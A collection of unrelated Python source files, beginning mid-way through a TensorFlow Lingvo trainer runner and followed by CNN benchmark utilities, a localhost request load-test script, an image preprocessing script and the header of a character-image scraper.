FLAGS.ps_job = '/job:worker'
FLAGS.ps_replicas = FLAGS.worker_replicas
if FLAGS.mode == 'async' and FLAGS.job in ('controller', 'trainer', 'ps'):
FLAGS.worker_job = '/job:trainer'
FLAGS.worker_replicas = len(cluster_spec_dict['trainer'])
FLAGS.ps_job = '/job:ps'
FLAGS.ps_replicas = len(cluster_spec_dict['ps'])
def MaybeConfigCloudTpu(self):
"""If given `FLAGS.tpu`, update flags for running on a Cloud TPU."""
if not FLAGS.tpu:
return
if not FLAGS.job:
FLAGS.job = 'trainer_client'
if FLAGS.job not in ('trainer_client', 'executor_tpu'):
raise ValueError('Only trainer_client and executor_tpu jobs are '
'supported on TPU.')
cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
tpu=FLAGS.tpu,
project=FLAGS.gcp_project,
zone=FLAGS.tpu_zone,
job_name=FLAGS.job)
cluster_spec_dict = cluster_resolver.cluster_spec().as_dict()
FLAGS.mode = 'sync'
FLAGS.tf_master = cluster_resolver.master()
FLAGS.worker_job = '/job:{}'.format(FLAGS.job)
FLAGS.worker_replicas = 1
FLAGS.worker_num_tpu_hosts = len(cluster_spec_dict[FLAGS.job])
FLAGS.worker_tpus = (
cluster_resolver.num_accelerators()['TPU'] * FLAGS.worker_num_tpu_hosts)
FLAGS.ps_job = FLAGS.worker_job
if FLAGS.job == 'trainer_client':
FLAGS.ps_replicas = FLAGS.worker_replicas
FLAGS.cluster_spec = ('@'.join('{}={}'.format(job, ','.join(hosts))
for job, hosts in cluster_spec_dict.items()))
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
FLAGS.checkpoint_in_trainer_tpu = True
def UpdateClusterParamsFromFlags(self, cluster, job_name):
"""Update `cluster` with a training cluster configuration from flags."""
cluster.mode = FLAGS.mode
cluster.job = job_name
cluster.task = FLAGS.task
cluster.do_eval = job_name in ['evaler', 'decoder']
cluster.logdir = FLAGS.logdir
cluster.controller.name = FLAGS.controller_job
cluster.controller.gpus_per_replica = FLAGS.controller_gpus
cluster.worker.name = FLAGS.worker_job
cluster.worker.replicas = FLAGS.worker_replicas
cluster.worker.gpus_per_replica = FLAGS.worker_gpus
cluster.worker.tpus_per_replica = FLAGS.worker_tpus
cluster.worker.num_tpu_hosts = FLAGS.worker_num_tpu_hosts
cluster.worker.devices_per_split = FLAGS.worker_split_size
if FLAGS.additional_worker_jobs:
for additional_job in FLAGS.additional_worker_jobs:
cluster.worker.additional_worker_names.append(additional_job)
if FLAGS.tpu:
job_name = cluster.worker.name.replace('/job:', '', 1)
worker_hosts = _GetClusterSpecDict()[job_name]
if FLAGS.additional_worker_jobs:
for additional_job in cluster.worker.additional_worker_names:
additional_job_name = additional_job.replace('/job:', '', 1)
worker_hosts.extend(_GetClusterSpecDict()[additional_job_name])
cluster.worker.targets = ','.join(
'grpc://{}'.format(host) for host in worker_hosts)
cluster.ps.name = FLAGS.ps_job
cluster.ps.replicas = FLAGS.ps_replicas
cluster.ps.gpus_per_replica = FLAGS.ps_gpus
cluster.input.name = FLAGS.input_job
cluster.input.replicas = FLAGS.input_replicas
cluster.input.targets = FLAGS.input_targets
cluster.evaler.name = FLAGS.evaler_job
cluster.evaler.replicas = FLAGS.evaler_replicas
cluster.evaler.gpus_per_replica = FLAGS.evaler_gpus
cluster.decoder.name = FLAGS.decoder_job
cluster.decoder.replicas = FLAGS.decoder_replicas
cluster.decoder.gpus_per_replica = FLAGS.decoder_gpus
cluster.tf_data_service_address = FLAGS.tf_data_service_address
cluster.add_summary = FLAGS.add_summary
cluster.reporting_job = FLAGS.vizier_reporting_job
def _CreateRunner(self, job, model_task_name, logdir, tf_master, trial):
"""Create a runner."""
evaler_job_name_prefix = 'evaler_'
decoder_job_name_prefix = 'decoder_'
tf.logging.info('Job %s start', job)
common_args = (model_task_name, logdir, tf_master, trial)
if job == 'controller':
cfg = self.GetParamsForDataset('controller', 'Train')
cfg.cluster.xla_device = 'cpu'
return self.Controller(cfg, *common_args)
elif job == 'trainer':
cfg = self.GetParamsForDataset('trainer', 'Train')
return self.Trainer(cfg, *common_args)
elif job == 'trainer_client':
cfg = self.GetParamsForDataset('trainer_client', 'Train')
if py_utils.use_tpu():
cfg.cluster.xla_device = 'tpu'
return self.TrainerTpu(cfg, *common_args)
else:
return self.Trainer(cfg, *common_args)
elif job.startswith(evaler_job_name_prefix):
dataset_name = job[len(evaler_job_name_prefix):]
cfg = self.GetParamsForDataset('evaler', dataset_name)
return self.Evaler(dataset_name.lower(), cfg, *common_args)
elif job.startswith(decoder_job_name_prefix):
dataset_name = job[len(decoder_job_name_prefix):]
cfg = self.GetParamsForDataset('decoder', dataset_name)
return self.Decoder(dataset_name.lower(), cfg, *common_args)
elif job in ('ps', 'worker', 'input'):
self._tf_server.join()
elif job == 'executor_tpu':
ps_cfg_dict, train_cfg = self.GetExecutorParams()
return self.ExecutorTpu(train_cfg, ps_cfg_dict, *common_args)
else:
raise ValueError('job %s is not supported' % job)
def CreateRunners(self, jobs, logdir, trial=base_trial.NoOpTrial()):
"""Creates a list of runners based on `FLAGS.mode`.
Args:
jobs: a list of runner jobs.
logdir: the directory used for logging, usually on CNS.
trial: optional `Trial` object, used for reporting measures and early
stopping.
Returns:
A list of `.BaseRunner`, one per job in `jobs`.
"""
runners = []
is_training = 'trainer' in jobs or 'trainer_client' in jobs
for j in jobs:
tf_master = FLAGS.tf_master
# Ensure that decoder or evaler threads do not clobber variables being
# updated by trainer by forcing them to use independent sessions.
if (is_training and (j.startswith('decoder') or j.startswith('evaler'))):
tf_master = ''
runner = self._CreateRunner(j, FLAGS.model_task_name, logdir, tf_master,
trial)
runners.append(runner)
return runners
def StartRunners(self, runners):
"""Runs `runners` in parallel threads.
Returns when all of them finish.
Args:
runners: a list of `.BaseRunner`.
Returns:
None.
"""
threads = []
tf.logging.info('Starting runners')
for runner in runners:
runner_class_name = str(runner)
t = threading.Thread(target=runner.Start, name=runner_class_name)
t.daemon = True
t.start()
threads.append(t)
if runner.enqueue_ops:
tf.logging.info('Total num runner.enqueue_ops: %d',
len(runner.enqueue_ops))
for i, enqueue_op in enumerate(runner.enqueue_ops):
def StartEnqueue(runner, op):
tf.logging.info('Starting enqueue op %s', op.name)
return lambda: runner.StartEnqueueOp(op)
enqueue_name = '%s-enqueue-%d' % (runner_class_name, i)
tq = threading.Thread(
target=StartEnqueue(runner, enqueue_op), name=enqueue_name)
tq.start()
threads.append(tq)
tf.logging.info('Waiting for runners to finish...')
for t in threads:
tf.logging.info('Waiting for thread to finish: %s' % t.name)
while True:
t.join(1)
if not t.is_alive():
break
tf.logging.info('All runners done.')
def RunTrial(self, job, logdir, trial):
"""A wrapper function for running a trial."""
# Run each job in separate process/task
# TODO(rpang): add support for running evaler_test and decoder.
self.StartRunners(self.CreateRunners([job], logdir, trial))
def MaybeConfigRunLocally(self):
"""Update flags if configured to run locally."""
if not FLAGS.run_locally:
# Do nothing
return
FLAGS.tf_master = tf.distribute.Server.create_local_server().target
if not FLAGS.mode:
FLAGS.mode = 'sync'
if not FLAGS.job:
if FLAGS.run_locally == 'tpu':
FLAGS.job = 'trainer_client'
elif FLAGS.mode == 'async':
FLAGS.job = 'controller,trainer'
else:
FLAGS.job = 'controller,trainer_client'
FLAGS.task = 0
local_job = '/job:localhost'
FLAGS.controller_job = local_job
FLAGS.worker_job = local_job
FLAGS.worker_replicas = 1
if FLAGS.run_locally == 'gpu':
if not FLAGS.worker_gpus:
FLAGS.worker_gpus = 1
else:
FLAGS.worker_gpus = 0
if FLAGS.run_locally == 'tpu':
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
else:
FLAGS.worker_tpus = 0
if not FLAGS.worker_split_size:
FLAGS.worker_split_size = 1
FLAGS.ps_job = local_job
FLAGS.ps_replicas = 1
FLAGS.ps_gpus = 0
FLAGS.input_job = local_job
FLAGS.input_replicas = 0
FLAGS.evaler_job = local_job
FLAGS.evaler_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.evaler_gpus = 1
else:
FLAGS.evaler_gpus = 0
FLAGS.decoder_job = local_job
FLAGS.decoder_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.decoder_gpus = 1
else:
FLAGS.decoder_gpus = 0
def InspectParams(self):
r"""Print out all the params.
An example to run this mode:
bazel-bin/lingvo/trainer --logtostderr \
--model=image.mnist.LeNet5 --mode=inspect_params --logdir=/tmp/lenet5 \
--run_locally=cpu
"""
FLAGS.mode = 'sync'
cls = self.model_registry.GetClass(self._model_name)
tf.io.gfile.makedirs(FLAGS.logdir)
for dataset in datasets.GetDatasets(cls):
p = self.GetParamsForDataset('controller', dataset)
outf = os.path.join(FLAGS.logdir, dataset.lower() + '-params.txt')
tf.logging.info('Write all params for {} to {}'.format(dataset, outf))
with tf.io.gfile.GFile(outf, 'w') as f:
f.write(p.ToText())
def InspectModel(self):
"""Prints out model analysis for the model."""
FLAGS.mode = 'sync'
p = self.GetParamsForDataset('controller', 'Train')
c = cluster_factory.Cluster(p.cluster)
model_part_regex = FLAGS.inspect_model_part_regex
part_pattern = None
if model_part_regex:
part_pattern = {}
for pat_str in model_part_regex:
first_colon = pat_str.find(':')
if first_colon < 0:
msg = f'Cannot understand --inspect_model_part_regex={pat_str}.'
raise ValueError(msg)
name = pat_str[:first_colon]
pattern = pat_str[first_colon + 1:]
part_pattern[name] = pattern
with tf.Graph().as_default(), c, tf.device(c.GetPlacer()):
analysis, _ = summary_utils.ModelAnalysis(
p.Instantiate(),
topn=FLAGS.inspect_model_topn,
part_pattern=part_pattern)
print(analysis)
def InspectDatasets(self):
"""Prints out datasets configured for the model."""
cls = self.model_registry.GetClass(self._model_name)
print(','.join([dataset.lower() for dataset in datasets.GetDatasets(cls)]))
def InspectDecoder(self):
"""Prints out datasets configured for the decoder."""
cls = self.model_registry.GetClass(self._model_name)
params = cls()
has_decoder = False
if issubclass(cls, base_model_params.SingleTaskModelParams):
has_decoder = params.Task(
).cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics
else:
for _, task_param in params.Model().task_params.IterParams():
has_decoder |= (
task_param.cls.CreateDecoderMetrics !=
base_model.BaseTask.CreateDecoderMetrics)
if has_decoder:
# We assume that the proper decoder is implemented.
self.InspectDatasets()
else:
print('')
def SetModelName(self, model_name):
"""Sets the model name."""
self._model_name = model_name
def WriteInferenceGraph(self, cfg=None, prune_graph=True):
"""Generates the inference graphs for a given model.
Args:
cfg: Full `~.hyperparams.Params` for the model class. If present,
this cfg will be used instead of retrieving from model_registry.
prune_graph: If true, prune the graph to just the parts we need.
Returns:
InferenceGraph proto for cpu.
"""
inference_graph_dir = os.path.join(FLAGS.logdir, 'inference_graphs')
tf.io.gfile.makedirs(inference_graph_dir)
tf.logging.info('Writing inference graphs to dir: %s', inference_graph_dir)
if not cfg:
cfg = self.model_registry.GetParams(self._model_name,
FLAGS.inference_dataset_name)
task_names = [FLAGS.model_task_name]
if (issubclass(cfg.cls, base_model.MultiTaskModel) and
not FLAGS.model_task_name):
task_names = base_model.MultiTaskModel.TaskNames(cfg)
inference_graph_proto = None
if FLAGS.inference_graph_filename:
# Custom inference graph.
for task_name in task_names:
filename_prefix = FLAGS.inference_graph_filename
if task_name:
filename_prefix = '%s_inference' % task_name
filename_prefix = os.path.join(inference_graph_dir, filename_prefix)
device = ''
var_options = None
if FLAGS.inference_graph_device == 'tpu':
device = 'tpu'
var_options = 'ON_DEVICE'
device_options = inference_graph_exporter.InferenceDeviceOptions(
device=device,
retain_device_placement=False,
var_options=var_options,
gen_init_op=FLAGS.inference_gen_tpu_init_op,
dtype_override=None,
fprop_dtype_override=None)
inference_graph_proto = (
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=task_name,
device_options=device_options,
export_path=filename_prefix + '.pbtxt',
random_seed=FLAGS.inference_graph_random_seed,
prune_graph=prune_graph))
else:
for task_name in task_names:
filename_prefix = 'inference'
if task_name:
filename_prefix = '%s_inference' % task_name
filename_prefix = os.path.join(inference_graph_dir, filename_prefix)
# Standard inference graph.
try:
inference_graph_proto = (
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=task_name,
export_path=filename_prefix + '.pbtxt',
random_seed=FLAGS.inference_graph_random_seed,
prune_graph=prune_graph))
except NotImplementedError as e:
tf.logging.error('Cannot write inference graph: %s', e)
# TPU inference graph. Not all models support it so fail silently.
try:
device_options = self.inference_graph_exporter.InferenceDeviceOptions(
device='tpu',
retain_device_placement=False,
var_options='ON_DEVICE',
gen_init_op=FLAGS.inference_gen_tpu_init_op,
dtype_override=None,
fprop_dtype_override=None)
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=task_name,
device_options=device_options,
export_path=filename_prefix + '_tpu.pbtxt',
random_seed=FLAGS.inference_graph_random_seed,
prune_graph=prune_graph)
except Exception as e: # pylint: disable=broad-except
tf.logging.error('Error exporting TPU inference graph: %s' % e)
if FLAGS.graph_def_filename and inference_graph_proto:
for graph_def_filename in FLAGS.graph_def_filename:
tf.logging.info('Writing graphdef: %s', graph_def_filename)
dir_path = os.path.dirname(graph_def_filename)
if (not tf.io.gfile.exists(dir_path) or
not tf.io.gfile.isdir(dir_path)):
tf.io.gfile.makedirs(dir_path)
with tf.io.gfile.GFile(graph_def_filename, 'w') as f:
f.write(text_format.MessageToString(inference_graph_proto.graph_def))
return inference_graph_proto
def RunEvalerOnce(self):
"""Run once evaler."""
m = re.match(r'evaler_once_([^_@]+)@(\d+)', FLAGS.job)
dataset_name, ckpt_id = m.group(1), int(m.group(2))
cfg = self.GetParamsForDataset('evaler', dataset_name)
evaler = self.Evaler(dataset_name.lower(), cfg, FLAGS.model_task_name,
FLAGS.logdir, FLAGS.tf_master)
evaler.EvalCheckpoint(ckpt_id)
def Start(self):
"""Start the process."""
tf.logging.set_verbosity(tf.logging.INFO)
tf.logging.info('tf_api_version: %s', tf.summarize_tf2_status())
if FLAGS.mode == 'inspect_params':
self.InspectParams()
return
if FLAGS.mode == 'inspect_model':
self.InspectModel()
return
if FLAGS.mode == 'inspect_evaler':
self.InspectDatasets()
return
if FLAGS.mode == 'inspect_decoder':
self.InspectDecoder()
return
if FLAGS.mode == 'write_inference_graph':
self.WriteInferenceGraph()
return
if FLAGS.mode == 'shell':
_StartShell(locals())
return
assert FLAGS.mode in ['sync', 'async']
self.MaybeConfigRunLocally()
self.MaybeConfigRunDistributed()
self.MaybeConfigCloudTpu()
self.MaybeLaunchTensorFlow()
if FLAGS.job.startswith('evaler_once_'):
# E.g., trainer --model=foo.bar.Model --logdir=...
# --run_locally=cpu --mode=sync --job=evaler_once_test@65200
self.RunEvalerOnce()
return
self.StartRunners(self.CreateRunners(FLAGS.job.split(','), FLAGS.logdir))
def main(unused_argv):
RunnerManager(FLAGS.model).Start()
if __name__ == '__main__':
py_utils.SetEagerMode(False)
tf.flags.mark_flag_as_required('model')
FLAGS(sys.argv, known_only=True)
if FLAGS.disable_tf2:
tf.disable_v2_behavior()
model_imports.ImportParams(FLAGS.model)
FLAGS.unparse_flags()
tf.app.run(main)
|
cnn_util.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for CNN benchmarks."""
from __future__ import print_function
import sys
import threading
import numpy as np
import tensorflow as tf
import json
CLUSTER_FILE='cluster.cfg'
def tensorflow_version_tuple():
v = tf.__version__
major, minor, patch = v.split('.')
return (int(major), int(minor), patch)
def tensorflow_version():
vt = tensorflow_version_tuple()
return vt[0] * 1000 + vt[1]
def log_fn(log):
print(log)
def roll_numpy_batches(array, batch_size, shift_ratio):
"""Moves a proportion of batches from start to the end of the array.
This function moves a proportion of batches, specified by `shift_ratio`, from
the starts of the array to the end. The number of batches moved is rounded
down to the nearest integer. For example,
```
roll_numpy_batches([1, 2, 3, 4, 5, 6], 2, 0.34) == [3, 4, 5, 6, 1, 2]
```
Args:
array: A Numpy array whose first dimension is the batch dimension.
batch_size: The batch size.
shift_ratio: Proportion of batches to move from the start of the array to
the end of the array.
Returns:
A new Numpy array, with a proportion of the batches at the start of `array`
moved to the end.
"""
num_items = array.shape[0]
assert num_items % batch_size == 0
num_batches = num_items // batch_size
starting_batch = int(num_batches * shift_ratio)
starting_item = starting_batch * batch_size
return np.roll(array, -starting_item, axis=0)
# For Python 2.7 compatibility, we do not use threading.Barrier.
class Barrier(object):
"""Implements a lightweight Barrier.
Useful for synchronizing a fixed number of threads at known synchronization
points. Threads block on 'wait()' and simultaneously return once they have
all made that call.
# Implementation adopted from boost/thread/barrier.hpp
"""
def __init__(self, parties):
"""Create a barrier, initialised to 'parties' threads."""
self.cond = threading.Condition(threading.Lock())
self.parties = parties
# Indicates the number of waiting parties.
self.waiting = 0
# generation is needed to deal with spurious wakeups. If self.cond.wait()
# wakes up for other reasons, generation will force it go back to wait().
self.generation = 0
self.broken = False
def wait(self):
"""Wait for the barrier."""
with self.cond:
# Check if the barrier has been disabled or not.
if self.broken:
return
gen = self.generation
self.waiting += 1
if self.waiting == self.parties:
self.waiting = 0
self.generation += 1
self.cond.notify_all()
# loop because of spurious wakeups
while gen == self.generation:
self.cond.wait()
# TODO(huangyp): Remove this method once we find a way to know which step
# is the last barrier.
def abort(self):
"""Clear existing barrier and disable this barrier."""
with self.cond:
if self.waiting > 0:
self.generation += 1
self.cond.notify_all()
self.broken = True
class ImageProducer(object):
"""An image producer that puts images into a staging area periodically.
This class is useful for periodically running a set of ops, `put_ops` on a
different thread every `batch_group_size` steps.
The notify_image_consumption() method is used to increment an internal counter
so that every `batch_group_size` times it is called, `put_ops` is executed. A
barrier is placed so that notify_image_consumption() will block until
the previous call to `put_ops` has been executed.
The start() method is used to start the thread that runs `put_ops`.
The done() method waits until the last put_ops is executed and stops the
thread.
The purpose of this class is to fill an image input pipeline every
`batch_group_size` steps. Suppose `put_ops` supplies `batch_group_size` images
to the input pipeline when run, and that every step, 1 batch of images is
consumed. Then, by calling notify_image_consumption() every step, images are
supplied to the input pipeline at the same amount they are consumed.
Example usage:
```
put_ops = ... # Enqueues `batch_group_size` batches to a StagingArea
get_op = ... # Dequeues 1 batch, and does some operations on it
batch_group_size = 4
with tf.Session() as sess:
image_producer = cnn_util.ImageProducer(sess, put_op, batch_group_size)
image_producer.start()
for _ in range(100):
sess.run(get_op)
image_producer.notify_image_consumption()
```
"""
def __init__(self, sess, put_ops, batch_group_size, use_python32_barrier):
self.sess = sess
self.num_gets = 0
self.put_ops = put_ops
self.batch_group_size = batch_group_size
self.done_event = threading.Event()
if (use_python32_barrier and
sys.version_info[0] == 3 and sys.version_info[1] >= 2):
self.put_barrier = threading.Barrier(2)
else:
self.put_barrier = Barrier(2)
def _should_put(self):
return (self.num_gets + 1) % self.batch_group_size == 0
def done(self):
"""Stop the image producer."""
self.done_event.set()
self.put_barrier.abort()
self.thread.join()
def start(self):
"""Start the image producer."""
self.sess.run([self.put_ops])
self.thread = threading.Thread(target=self._loop_producer)
# Set daemon to true to allow Ctrl + C to terminate all threads.
self.thread.daemon = True
self.thread.start()
def notify_image_consumption(self):
"""Increment the counter of image_producer by 1.
This should only be called by the main thread that consumes images and runs
the model computation. One batch of images should be consumed between
calling start() and the first call to this method. Then, one batch of images
should be consumed between any two successive calls to this method.
"""
if self._should_put():
self.put_barrier.wait()
self.num_gets += 1
def _loop_producer(self):
while not self.done_event.isSet():
self.sess.run([self.put_ops])
self.put_barrier.wait()
class BaseClusterManager(object):
"""The manager for the cluster of servers running the benchmark."""
def __init__(self, params):
"""
worker_hosts = params.worker_hosts.split(',')
ps_hosts = params.ps_hosts.split(',') if params.ps_hosts else []
cluster = {'worker': worker_hosts}
if ps_hosts:
cluster['ps'] = ps_hosts
"""
with open(CLUSTER_FILE) as f:
cluster = json.load(f)
self._cluster_spec = tf.train.ClusterSpec(cluster)
def get_target(self):
"""Returns a target to be passed to tf.Session()."""
raise NotImplementedError('get_target must be implemented by subclass')
def join_server(self):
raise NotImplementedError('join must be implemented by subclass')
def get_cluster_spec(self):
return self._cluster_spec
def num_workers(self):
return len(self._cluster_spec.job_tasks('worker'))
def num_ps(self):
if 'ps' in self._cluster_spec.jobs:
return len(self._cluster_spec.job_tasks('ps'))
else:
return 0
class GrpcClusterManager(BaseClusterManager):
"""A cluster manager for a cluster networked with gRPC."""
def __init__(self, params, config_proto):
super(GrpcClusterManager, self).__init__(params)
if params.job_name == 'controller':
self._target = 'grpc://%s' % self._cluster_spec.job_tasks('worker')[0]
else:
self._server = tf.train.Server(self._cluster_spec,
job_name=params.job_name,
task_index=params.task_index,
config=config_proto,
protocol=params.server_protocol)
self._target = self._server.target
def get_target(self):
return self._target
def join_server(self):
return self._server.join()
|
send_request.py
|
import requests
from threading import Thread
with open('image.jpeg', 'rb') as f:
FILE = f.read()
# send request to http://127.0.0.1:8000
def send_request(host, port):
for _ in range(100):
r = requests.post(f"http://{host}:{port}", data={'file': FILE})
print(f"Receive response: '{r.text}' from {r.url}")
if __name__ == '__main__':
t_lst = []
for _ in range(4):
t = Thread(target=send_request, args=('127.0.0.1', 8000))
t_lst.append(t)
t.start()
for t in t_lst:
t.join()
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
tf.logging.set_verbosity(tf.logging.ERROR)
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src -= np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
main()
|
getchu_grab_info.py
|
'''
getchu 角色图爬虫
数据集布局:
datset/
company.html
dataset/id2name.json
dataset/list.html
dataset/company_id/
dataset/company_id/id2name.json
dataset/company_id/product_id/
dataset/company_id/product_id/角色主图.jpg
dataset/company_id/product_id/角色全身图.jpg
dataset/company_id/product_id/data.json
dataset/company_id/product_id/soft.html
*.html 为原始页面数据,同时也是缓存
data.json 内容
<chara>
----<chara_name>
--------<main_pic_name>
--------<main_pic_link>
--------<full_pic_name>
--------<full_pic_link>
# 角色介绍挖出来没啥用,去掉
#--------<chara_comment>
#--------<cv>
<product>
----<cover_pic_name>
----<cover_pic_link>
----<painter>
----<release_date>
# 脚本和音乐因为不够通用,同时也用处不大,去掉了
#----<scenario>
#----<composer>
'''
from bs4 import BeautifulSoup
import requests
from requests.adapters import HTTPAdapter
import re
import os
import json
import urllib.parse
import time
import queue
from threading import Thread
# -----------------------------------------------------------
# 参数区
